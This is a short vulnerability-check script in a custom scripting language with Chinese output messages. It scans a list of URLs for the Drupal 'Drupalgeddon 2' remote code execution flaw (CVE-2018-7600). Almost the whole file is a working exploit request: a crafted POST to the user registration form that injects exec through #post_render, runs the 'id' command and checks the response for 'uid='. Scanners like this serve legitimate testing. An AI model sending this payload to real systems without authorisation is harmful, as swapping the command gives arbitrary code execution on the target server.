#request urls = array
#define payload = /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
#define bug = uid=
#define info = 存在Drupal Drupalgeddon 2 Remote Code Execution Vulnerability (CVE-2018-7600)
#define post = form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpPost(url.payload,post,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
